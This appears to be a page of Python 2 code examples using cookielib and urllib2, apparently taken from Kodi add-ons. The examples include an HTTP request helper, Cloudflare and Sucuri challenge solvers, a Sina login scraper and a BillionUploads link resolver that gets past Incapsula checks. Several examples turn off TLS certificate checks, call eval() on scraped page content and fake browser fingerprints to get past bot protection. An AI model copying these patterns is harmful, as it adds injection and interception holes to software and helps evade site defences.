        return None
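A hedged usage sketch of the request() helper above (the URL is illustrative):

html = request('http://example.com/page')                    # body only
ck = request('http://example.com/page', output='cookie')     # 'name=value; ...' string
body, code, resp_headers, req_headers, ck = request(
    'http://example.com/page', output='extended')            # five-item tuple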
Example #27
def request(url, close=True, redirect=True, error=False, proxy=None, post=None, headers=None, mobile=False, limit=None, referer=None, cookie=None, output='', timeout='30'):
    try:
        handlers = []

        if proxy is not None:
            handlers += [urllib2.ProxyHandler({'http': '%s' % (proxy)}), urllib2.HTTPHandler]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)


        if output == 'cookie' or output == 'extended' or close is not True:
            cookies = cookielib.LWPCookieJar()
            handlers += [urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies)]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)


        try:
            if sys.version_info < (2, 7, 9): raise Exception()
            import ssl; ssl_context = ssl.create_default_context()
            ssl_context.check_hostname = False
            ssl_context.verify_mode = ssl.CERT_NONE
            handlers += [urllib2.HTTPSHandler(context=ssl_context)]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)
        except:
            pass


        # Fall back to an empty dict when no (valid) headers were passed in.
        if not isinstance(headers, dict): headers = {}
        if 'User-Agent' in headers:
            pass
        elif mobile is not True:
            #headers['User-Agent'] = agent()
            headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            headers['User-Agent'] = 'Apple-iPhone/701.341'
        if 'Referer' in headers:
            pass
        elif referer is None:
            headers['Referer'] = '%s://%s/' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc)
        else:
            headers['Referer'] = referer
        if 'Accept-Language' not in headers:
            headers['Accept-Language'] = 'en-US'
        if 'Cookie' in headers:
            pass
        elif cookie is not None:
            headers['Cookie'] = cookie


        if redirect == False:

            class NoRedirection(urllib2.HTTPErrorProcessor):
                def http_response(self, request, response): return response

            opener = urllib2.build_opener(NoRedirection)
            opener = urllib2.install_opener(opener)

            try: del headers['Referer']
            except: pass


        request = urllib2.Request(url, data=post, headers=headers)


        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:

            if response.code == 503:
                if 'cf-browser-verification' in response.read(5242880):

                    netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc)

                    ua = headers['User-Agent']

                    cf = cache.get(cfcookie().get, 168, netloc, ua, timeout)

                    headers['Cookie'] = cf

                    request = urllib2.Request(url, data=post, headers=headers)

                    response = urllib2.urlopen(request, timeout=int(timeout))

                elif error == False:
                    return

            elif error == False:
                return


        if output == 'cookie':
            try: result = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])
            except: pass
            try: result = cf
            except: pass
            if close == True: response.close()
            return result

        elif output == 'geturl':
            result = response.geturl()
            if close == True: response.close()
            return result

        elif output == 'headers':
            result = response.headers
            if close == True: response.close()
            return result

        elif output == 'chunk':
            try: content = int(response.headers['Content-Length'])
            except: content = (2049 * 1024)
            if content < (2048 * 1024): return
            result = response.read(16 * 1024)
            if close == True: response.close()
            return result


        if limit == '0':
            result = response.read(224 * 1024)
        elif limit is not None:
            result = response.read(int(limit) * 1024)
        else:
            result = response.read(5242880)


        if 'sucuri_cloudproxy_js' in result:
            su = sucuri().get(result)

            headers['Cookie'] = su

            request = urllib2.Request(url, data=post, headers=headers)

            response = urllib2.urlopen(request, timeout=int(timeout))

            if limit == '0':
                result = response.read(224 * 1024)
            elif limit is not None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)


        if output == 'extended':
            response_headers = response.headers
            response_code = str(response.code)
            try: cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])
            except: pass
            try: cookie = cf
            except: pass
            if close == True: response.close()
            return (result, response_code, response_headers, headers, cookie)
        else:
            if close == True: response.close()
            return result
    except:
        return
Example #28
    def get_cookie(self, netloc, ua, timeout):
        try:
            headers = {'User-Agent': ua}
            request = urllib2.Request(netloc)
            _add_request_header(request, headers)

            try:
                response = urllib2.urlopen(request, timeout=int(timeout))
            except urllib2.HTTPError as response:
                result = response.read(5242880)
                try:
                    encoding = response.info().getheader('Content-Encoding')
                except:
                    encoding = None
                if encoding == 'gzip':
                    result = gzip.GzipFile(fileobj=StringIO(result)).read()

            jschl = re.findall('name="jschl_vc" value="(.+?)"/>', result)[0]
            init = re.findall('setTimeout\(function\(\){\s*.*?.*:(.*?)};',
                              result)[-1]
            builder = re.findall(r"challenge-form\'\);\s*(.*)a.v", result)[0]
            decryptVal = self.parseJSString(init)
            lines = builder.split(';')

            for line in lines:
                if len(line) > 0 and '=' in line:
                    sections = line.split('=')
                    line_val = self.parseJSString(sections[1])
                    decryptVal = int(
                        eval(
                            str(decryptVal) + sections[0][-1] + str(line_val)))

            answer = decryptVal + len(urlparse(netloc).netloc)
            query = '%s/cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' % (
                netloc, jschl, answer)

            if 'type="hidden" name="pass"' in result:
                passval = re.findall('name="pass" value="(.*?)"', result)[0]
                query = '%s/cdn-cgi/l/chk_jschl?pass=%s&jschl_vc=%s&jschl_answer=%s' % (
                    netloc, quote_plus(passval), jschl, answer)
                time.sleep(6)

            cookies = cookielib.LWPCookieJar()
            handlers = [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

            try:
                request = urllib2.Request(query)
                _add_request_header(request, headers)
                response = urllib2.urlopen(request, timeout=int(timeout))
            except:
                pass

            cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])

            if 'cf_clearance' in cookie:
                self.cookie = cookie
        except:
            pass
Example #29
import cookielib
import json
import re
import urllib2

body = {
    '__rnd': '',
    '_k': '',
    '_t': '0',
    'count': '50',
    'end_id': '',
    'max_id': '',
    'pagebar': '',
    'pre_page': '0',
    'uid': '1742439305'
}

uuid = None
cj = cookielib.LWPCookieJar()
cookie_support = urllib2.HTTPCookieProcessor(cj)
opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
urllib2.install_opener(opener)


# Fetch servertime, nonce, pubkey, rsakv
def get_info():
    url = 'http://login.sina.com.cn/sso/prelogin.php?entry=sso&callback=sinaSSOController.preloginCallBack&su=&rsakt=mod&client=ssologin.js(v1.4.4)'
    data = urllib2.urlopen(url).read()
    p = re.compile('\((.*)\)')
    try:
        json_data = p.search(data).group(1)
        data = json.loads(json_data)
        servertime = str(data['servertime'])
        nonce = data['nonce']
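The listing is cut off here; judging from the fields named in the comment above, a hedged completion might read:

        pubkey = data['pubkey']
        rsakv = data['rsakv']
        return servertime, nonce, pubkey, rsakv
    except:
        return None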
Example #30
    def billionuploads(self, url):
        try:
            cookie_file = os.path.join(cookiepath, 'billionuploads.lwp')

            cj = cookielib.LWPCookieJar()
            if os.path.exists(cookie_file):
                try:
                    cj.load(cookie_file, True)
                except:
                    cj.save(cookie_file, True)
            else:
                cj.save(cookie_file, True)

            normal = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            headers = [
                ('User-Agent',
                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0'
                 ),
                ('Accept',
                 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
                 ), ('Accept-Language', 'en-US,en;q=0.5'),
                ('Accept-Encoding', ''), ('DNT', '1'),
                ('Connection', 'keep-alive'), ('Pragma', 'no-cache'),
                ('Cache-Control', 'no-cache')
            ]
            normal.addheaders = headers

            class NoRedirection(urllib2.HTTPErrorProcessor):
                # Stop urllib2 from bypassing the 503 page.
                def http_response(self, request, response):
                    return response

                https_response = http_response

            opener = urllib2.build_opener(NoRedirection,
                                          urllib2.HTTPCookieProcessor(cj))
            opener.addheaders = normal.addheaders
            response = opener.open(url).read()
            decoded = re.search('(?i)var z="";var b="([^"]+?)"', response)
            if decoded:
                decoded = decoded.group(1)
                z = []
                for i in range(len(decoded) / 2):
                    z.append(int(decoded[i * 2:i * 2 + 2], 16))
                decoded = ''.join(map(unichr, z))
                incapurl = re.search(
                    '(?i)"GET","(/_Incapsula_Resource[^"]+?)"', decoded)
                if incapurl:
                    incapurl = 'http://billionuploads.com' + incapurl.group(1)
                    opener.open(incapurl)
                    cj.save(cookie_file, True)
                    response = opener.open(url).read()

            captcha = re.search(
                '(?i)<iframe src="(/_Incapsula_Resource[^"]+?)"', response)
            if captcha:
                captcha = 'http://billionuploads.com' + captcha.group(1)
                opener.addheaders.append(('Referer', url))
                response = opener.open(captcha).read()
                formurl = 'http://billionuploads.com' + re.search(
                    '(?i)<form action="(/_Incapsula_Resource[^"]+?)"',
                    response).group(1)
                resource = re.search('(?i)src=" (/_Incapsula_Resource[^"]+?)"',
                                     response)
                if resource:
                    import random
                    resourceurl = 'http://billionuploads.com' + resource.group(
                        1) + str(random.random())
                    opener.open(resourceurl)
                recaptcha = re.search(
                    '(?i)<script type="text/javascript" src="(https://www.google.com/recaptcha/api[^"]+?)"',
                    response)
                if recaptcha:
                    response = opener.open(recaptcha.group(1)).read()
                    challenge = re.search('''(?i)challenge : '([^']+?)',''',
                                          response)
                    if challenge:
                        challenge = challenge.group(1)
                        captchaimg = 'https://www.google.com/recaptcha/api/image?c=' + challenge
                        img = xbmcgui.ControlImage(450, 15, 400, 130,
                                                   captchaimg)
                        wdlg = xbmcgui.WindowDialog()
                        wdlg.addControl(img)
                        wdlg.show()

                        xbmc.sleep(3000)

                        kb = xbmc.Keyboard(
                            '', 'Please enter the text in the image', False)
                        kb.doModal()
                        if kb.isConfirmed():
                            capcode = kb.getText()
                            if capcode == '':
                                logerror(
                                    'BillionUploads - Image-Text not entered')
                                xbmc.executebuiltin(
                                    "XBMC.Notification(Image-Text not entered.,BillionUploads,2000)"
                                )
                                return None
                        else:
                            return None
                        wdlg.close()
                        captchadata = {}
                        captchadata['recaptcha_challenge_field'] = challenge
                        captchadata['recaptcha_response_field'] = capcode
                        opener.addheaders = headers
                        opener.addheaders.append(('Referer', captcha))
                        resultcaptcha = opener.open(
                            formurl, urllib.urlencode(captchadata)).info()
                        opener.addheaders = headers
                        response = opener.open(url).read()

            ga = re.search('(?i)"text/javascript" src="(/ga[^"]+?)"', response)
            if ga:
                jsurl = 'http://billionuploads.com' + ga.group(1)
                p = "p=%7B%22appName%22%3A%22Netscape%22%2C%22platform%22%3A%22Win32%22%2C%22cookies%22%3A1%2C%22syslang%22%3A%22en-US%22"
                p += "%2C%22userlang%22%3A%22en-US%22%2C%22cpu%22%3A%22WindowsNT6.1%3BWOW64%22%2C%22productSub%22%3A%2220100101%22%7D"
                opener.open(jsurl, p)
                response = opener.open(url).read()

    #         pid = re.search('(?i)PID=([^"]+?)"', response)
    #         if pid:
    #             normal.addheaders += [('Cookie','D_UID='+pid.group(1)+';')]
    #             opener.addheaders = normal.addheaders
            # 'filename' is expected to be provided by the surrounding resolver (not shown).
            if re.search('(?i)url=/distil_r_drop.html', response) and filename:
                url += '/' + filename
                response = normal.open(url).read()
            jschl = re.compile('name="jschl_vc" value="(.+?)"/>').findall(
                response)
            if jschl:
                jschl = jschl[0]
                maths = re.compile('value = (.+?);').findall(
                    response)[0].replace('(', '').replace(')', '')
                domain_url = re.compile('(https?://.+?/)').findall(url)[0]
                domain = re.compile('https?://(.+?)/').findall(domain_url)[0]
                final = normal.open(
                    domain_url +
                    'cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' %
                    (jschl, eval(maths) + len(domain))).read()
                html = normal.open(url).read()
            else:
                html = response

            data = {}
            r = re.findall(r'type="hidden" name="(.+?)" value="(.*?)">', html)
            for name, value in r:
                data[name] = value

            captchaimg = re.search(
                '<img src="((?:http://|www\.)?BillionUploads.com/captchas/.+?)"',
                html)
            if captchaimg:

                img = xbmcgui.ControlImage(550, 15, 240, 100,
                                           captchaimg.group(1))
                wdlg = xbmcgui.WindowDialog()
                wdlg.addControl(img)
                wdlg.show()

                kb = xbmc.Keyboard('', 'Please enter the text in the image',
                                   False)
                kb.doModal()
                if kb.isConfirmed():
                    capcode = kb.getText()
                    if capcode == '':
                        showpopup(
                            'BillionUploads',
                            '[B]You must enter the text from the image to access video[/B]',
                            5000, elogo)
                        return None
                else:
                    return None
                wdlg.close()

                data.update({'code': capcode})

            data.update({'submit_btn': ''})
            enc_input = re.compile('decodeURIComponent\("(.+?)"\)').findall(
                html)
            if enc_input:
                dec_input = urllib2.unquote(enc_input[0])
                r = re.findall(r'type="hidden" name="(.+?)" value="(.*?)">',
                               dec_input)
                for name, value in r:
                    data[name] = value
            extradata = re.compile(
                "append\(\$\(document.createElement\('input'\)\).attr\('type','hidden'\).attr\('name','(.*?)'\).val\((.*?)\)"
            ).findall(html)
            if extradata:
                for attr, val in extradata:
                    if 'source="self"' in val:
                        val = re.compile(
                            '<textarea[^>]*?source="self"[^>]*?>([^<]*?)<'
                        ).findall(html)[0]
                    data[attr] = val.strip("'")
            r = re.findall("""'input\[name="([^"]+?)"\]'\)\.remove\(\)""",
                           html)

            for name in r:
                del data[name]

            normal.addheaders.append(('Referer', url))
            html = normal.open(url, urllib.urlencode(data)).read()
            cj.save(cookie_file, True)

            def custom_range(start, end, step):
                while start <= end:
                    yield start
                    start += step

            def checkwmv(e):
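                # Hand-rolled base64 decoder: 'u' spans the ASCII ranges of the
                # standard alphabet (A-Z, a-z, 0-9, '+', '/'); input is consumed
                # in 72-character chunks, 6 bits at a time.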
                s = ""
                i = []
                u = [[65, 91], [97, 123], [48, 58], [43, 44], [47, 48]]
                for z in range(0, len(u)):
                    for n in range(u[z][0], u[z][1]):
                        i.append(chr(n))
                t = {}
                for n in range(0, 64):
                    t[i[n]] = n
                for n in custom_range(0, len(e), 72):
                    a = 0
                    h = e[n:n + 72]
                    c = 0
                    for l in range(0, len(h)):
                        f = t.get(h[l], 'undefined')
                        if f == 'undefined': continue
                        a = (a << 6) + f
                        c = c + 6
                        while c >= 8:
                            c = c - 8
                            s = s + chr((a >> c) % 256)
                return s

            dll = re.compile(
                '<input type="hidden" id="dl" value="(.+?)">').findall(html)
            if dll:
                # The value is double-encoded; strip the 'GvaZu' prefix and decode twice.
                dl = dll[0].split('GvaZu')[1]
                dl = checkwmv(dl)
                dl = checkwmv(dl)
            else:
                alt = re.compile('<source src="([^"]+?)"').findall(html)
                if alt:
                    dl = alt[0]
                else:
                    raise Exception('Unable to resolve - No Video File Found')

            return dl

        except Exception:
            raise